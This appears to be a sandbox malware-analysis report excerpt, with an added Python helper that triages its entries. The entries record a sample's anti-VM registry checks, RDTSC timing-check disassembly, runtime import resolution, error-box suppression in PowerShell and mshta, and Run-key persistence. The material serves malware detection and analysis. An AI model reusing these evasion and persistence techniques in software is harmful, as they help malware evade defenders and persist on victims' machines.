                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeCode function: 0_2_00C2F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00C2F98E
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeCode function: 0_2_00CA1C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00CA1C41
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeCode function: 20_2_00BD918F GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,20_2_00BD918F
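The entries in this section fuse the process path and the action name into one string, and the SetErrorMode lines below repeat the same text for dozens of processes. The following Python is an added triage helper, not part of the Joe Sandbox report or its tooling: it splits each line on the known action names, collapses verbatim repeats with a count, pulls out the persistence indicators (Run-key values and job files under the Windows Tasks folder) and counts the GetProcAddress calls per disassembled function, which is the usual sign of a packer resolving imports at runtime. The sample lines embedded in it are constructed, modelled on the entries above with shortened paths and a hypothetical function id; the function names are my own.

```python
"""Triage helpers for Joe Sandbox behavior lines of the form
'Source: <process path><Action>: <detail>'.

Added example, not Joe Sandbox code. In the extracted report the process
path and the action name are fused (".exeRegistry value created or modified:"),
so the parser splits on a fixed list of action names seen in this section.
"""
import re
from collections import Counter

# Action names that prefix the detail column in this section of the report.
ACTIONS = (
    "Registry value created or modified",
    "Process information set",
    "Code function",
    "File created",
)
LINE_RE = re.compile(
    r"^Source: (?P<source>.+?)(?P<action>"
    + "|".join(re.escape(a) for a in ACTIONS)
    + r"): (?P<detail>.*)$"
)
# Link label left behind by the interactive report page.
LINK_RESIDUE = re.compile(r"Jump to behavior$")

# Constructed sample, modelled on the entries above (paths shortened, function id hypothetical).
SAMPLE = r"""
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 132fd7f0ed.exe
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 132fd7f0ed.exe
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run am_no.cmd
Source: C:\Users\user\AppData\Local\Temp\loader.exeFile created: C:\Windows\Tasks\rapes.jobJump to behavior
Source: C:\Users\user\AppData\Local\Temp\x\stage.exeCode function: 9_2_00401000 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,9_2_00401000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
""".strip()


def parse_report(text):
    """Parse each line into a (source, action, detail) tuple; unparseable lines are skipped."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        detail = LINK_RESIDUE.sub("", m.group("detail")).strip()
        records.append((m.group("source"), m.group("action"), detail))
    return records


def collapse_duplicates(records):
    """Fold verbatim repeats into (record, count) pairs, keeping first-seen order."""
    counts = Counter(records)
    seen, out = set(), []
    for rec in records:
        if rec not in seen:
            seen.add(rec)
            out.append((rec, counts[rec]))
    return out


def persistence_indicators(records):
    """Run/RunOnce registry values and .job files dropped into the Windows Tasks folder."""
    found = set()
    for source, action, detail in records:
        if action == "Registry value created or modified" and r"\CurrentVersion\Run" in detail:
            found.add((source, detail))
        elif action == "File created" and detail.lower().startswith("c:\\windows\\tasks\\"):
            found.add((source, detail))
    return sorted(found)


def getprocaddress_counts(records):
    """Per disassembled function id, how many GetProcAddress calls the sandbox listed."""
    out = {}
    for _, action, detail in records:
        if action != "Code function":
            continue
        func_id = detail.split(" ", 1)[0]
        out[func_id] = detail.count("GetProcAddress")
    return out


def error_mode_suppressors(records):
    """Processes that set NOOPENFILEERRORBOX (SetErrorMode), with how often each did."""
    return Counter(
        src for src, action, detail in records
        if action == "Process information set" and detail == "NOOPENFILEERRORBOX"
    )


if __name__ == "__main__":
    recs = parse_report(SAMPLE)
    for rec, n in collapse_duplicates(recs):
        print(f"x{n:<3} {rec[1]}: {rec[2]}  [{rec[0]}]")
    print("persistence:", persistence_indicators(recs))
    print("GetProcAddress per function:", getprocaddress_counts(recs))
    print("SetErrorMode callers:", dict(error_mode_suppressors(recs)))
```

On a full report, run `parse_report` over the copied section and look first at `persistence_indicators`; the collapsed counts make the repeated NOOPENFILEERRORBOX entries readable without losing how many processes set it.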
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exe  Process information set: NOOPENFILEERRORBOX  (2 identical entries)
                                                Source: C:\Windows\SysWOW64\mshta.exe  Process information set: NOOPENFILEERRORBOX  (2 identical entries)
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Process information set: NOOPENFILEERRORBOX  (95 identical entries)
                                                Source: C:\Windows\System32\mshta.exe  Process information set: NOOPENFILEERRORBOX  (2 identical entries)
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Process information set: NOOPENFILEERRORBOX  (72 identical entries)
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exe Process information set: NOOPENFILEERRORBOX
                                                Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe Process information set: NOOPENFILEERRORBOX
                                                Source: C:\Users\user\AppData\Local\Temp\10111050101\132fd7f0ed.exe Process information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX

                                                Malware Analysis System Evasion

                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleep graph_0-96632
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXEFile opened: HKEY_CURRENT_USER\Software\Wine
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXEFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXEFile opened: HKEY_CURRENT_USER\Software\Wine
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXEFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                                                Source: C:\Users\user\AppData\Roaming\10000770100\vertualiziren.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                                                Source: C:\Users\user\AppData\Roaming\10000770100\vertualiziren.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                                                Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                                                Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                                                Source: C:\ProgramData\jnxnee\benskvi.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                                                Source: C:\ProgramData\jnxnee\benskvi.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                                                Source: C:\Users\user\AppData\Local\TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXEFile opened: HKEY_CURRENT_USER\Software\Wine
                                                Source: C:\Users\user\AppData\Local\TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXEFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                                                Source: C:\Users\user\AppData\Local\TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXEFile opened: HKEY_CURRENT_USER\Software\Wine
                                                Source: C:\Users\user\AppData\Local\TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXEFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                                                Source: C:\Users\user\AppData\Local\Temp\10111180101\7dbaa342f5.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                                                Source: C:\Users\user\AppData\Local\Temp\10111180101\7dbaa342f5.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 693296 second address: 692B2E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD81C888268h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c xor dword ptr [ebp+122D229Fh], eax 0x00000012 push dword ptr [ebp+122D140Dh] 0x00000018 jl 00007FD81C888270h 0x0000001e call dword ptr [ebp+122D188Eh] 0x00000024 pushad 0x00000025 cld 0x00000026 xor eax, eax 0x00000028 pushad 0x00000029 jne 00007FD81C88825Ch 0x0000002f xor dword ptr [ebp+122D232Bh], ebx 0x00000035 mov ebx, dword ptr [ebp+122D28D3h] 0x0000003b popad 0x0000003c mov edx, dword ptr [esp+28h] 0x00000040 jl 00007FD81C88825Ch 0x00000046 mov dword ptr [ebp+122D2973h], eax 0x0000004c sub dword ptr [ebp+122D26DCh], esi 0x00000052 mov esi, 0000003Ch 0x00000057 mov dword ptr [ebp+122D26DCh], ebx 0x0000005d add esi, dword ptr [esp+24h] 0x00000061 add dword ptr [ebp+122D270Bh], edx 0x00000067 lodsw 0x00000069 stc 0x0000006a add eax, dword ptr [esp+24h] 0x0000006e jmp 00007FD81C88825Eh 0x00000073 mov ebx, dword ptr [esp+24h] 0x00000077 stc 0x00000078 jng 00007FD81C888257h 0x0000007e stc 0x0000007f nop 0x00000080 push eax 0x00000081 push edx 0x00000082 push eax 0x00000083 push edx 0x00000084 push esi 0x00000085 pop esi 0x00000086 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 692B2E second address: 692B32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 692B32 second address: 692B38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 692B38 second address: 692B3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 811FC3 second address: 811FE1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD81C88825Eh 0x00000008 jmp 00007FD81C88825Bh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8002E1 second address: 8002F0 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FD81D0C8426h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8002F0 second address: 8002F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8002F7 second address: 8002FC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 81122A second address: 811234 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 81165A second address: 811669 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD81D0C842Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8117AD second address: 8117C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop esi 0x00000007 pushad 0x00000008 jmp 00007FD81C88825Dh 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8117C6 second address: 8117CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8117CB second address: 8117EB instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD81C888258h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007FD81C88825Fh 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 pop eax 0x00000014 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8117EB second address: 8117FD instructions: 0x00000000 rdtsc 0x00000002 jno 00007FD81D0C8426h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jp 00007FD81D0C8426h 0x00000012 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 85272B second address: 852746 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD81D0C842Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push eax 0x0000000b jg 00007FD81D0C8438h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 852746 second address: 85274A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 85274A second address: 85274E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8548F2 second address: 854906 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FD81C88825Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 854F22 second address: 854F30 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007FD81D0C842Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 855DD1 second address: 855DD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 855DD5 second address: 855DDB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 855DDB second address: 855DE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 855DE1 second address: 855DE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 855DE5 second address: 855DE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 857F0C second address: 857F2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 jmp 00007FD81D0C8433h 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 858F72 second address: 858F97 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FD81C888258h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD81C888266h 0x00000012 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 858F97 second address: 858F9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 85706A second address: 857070 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 857070 second address: 857075 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 857110 second address: 857136 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jmp 00007FD81C888264h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edi 0x0000000f js 00007FD81C88825Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 86128A second address: 8612A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD81D0C8431h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 7FB364 second address: 7FB368 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 86ABBB second address: 86ABCD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jp 00007FD81D0C842Ah 0x0000000e rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 7F97CD second address: 7F97D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 7F97D1 second address: 7F97EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD81D0C8433h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 86FF99 second address: 86FF9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8700F0 second address: 8700FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FD81D0C8426h 0x0000000a rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8701EC second address: 8701FD instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8701FD second address: 870201 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 870201 second address: 870207 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 870207 second address: 87021A instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD81D0C8428h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 87021A second address: 870251 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD81C888256h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007FD81C888268h 0x00000010 jnp 00007FD81C888256h 0x00000016 popad 0x00000017 popad 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f pushad 0x00000020 popad 0x00000021 pushad 0x00000022 popad 0x00000023 popad 0x00000024 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 870251 second address: 692B2E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD81D0C8437h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pop eax 0x0000000e stc 0x0000000f push dword ptr [ebp+122D140Dh] 0x00000015 pushad 0x00000016 mov bx, dx 0x00000019 mov eax, 71707773h 0x0000001e popad 0x0000001f call dword ptr [ebp+122D188Eh] 0x00000025 pushad 0x00000026 cld 0x00000027 xor eax, eax 0x00000029 pushad 0x0000002a jne 00007FD81D0C842Ch 0x00000030 xor dword ptr [ebp+122D232Bh], ebx 0x00000036 mov ebx, dword ptr [ebp+122D28D3h] 0x0000003c popad 0x0000003d mov edx, dword ptr [esp+28h] 0x00000041 jl 00007FD81D0C842Ch 0x00000047 mov dword ptr [ebp+122D2973h], eax 0x0000004d sub dword ptr [ebp+122D26DCh], esi 0x00000053 mov esi, 0000003Ch 0x00000058 mov dword ptr [ebp+122D26DCh], ebx 0x0000005e add esi, dword ptr [esp+24h] 0x00000062 add dword ptr [ebp+122D270Bh], edx 0x00000068 lodsw 0x0000006a stc 0x0000006b add eax, dword ptr [esp+24h] 0x0000006f jmp 00007FD81D0C842Eh 0x00000074 mov ebx, dword ptr [esp+24h] 0x00000078 stc 0x00000079 jng 00007FD81D0C8427h 0x0000007f stc 0x00000080 nop 0x00000081 push eax 0x00000082 push edx 0x00000083 push eax 0x00000084 push edx 0x00000085 push esi 0x00000086 pop esi 0x00000087 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 874DA2 second address: 874DA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
